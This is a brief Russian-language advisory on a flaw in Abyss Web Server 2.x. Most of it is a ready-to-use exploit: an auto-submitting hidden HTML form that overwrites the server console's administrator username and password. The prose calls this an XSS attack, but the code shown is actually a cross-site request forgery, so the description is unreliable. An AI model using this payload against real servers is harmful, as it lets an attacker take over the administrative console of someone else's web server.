Программа: Abyss Web Server 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<html>  
   <body onload="document.forms[0].submit()">  
        <form method="post" action="http://localhost:9999/console/credentials">  
            <input type="hidden" name="/console/credentials/login"   
                   value="new_username" />      
            <input type="hidden" name="/console/credentials/password/$pass1"   
                   value="new_password" />      
            <input type="hidden" name="/console/credentials/password/$pass2"   
                   value="new_password" />      
            <input type="hidden" name="/console/credentials/bok"   
                   value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />      
        </form>      
    </body>  
</html>  



Оставить мнение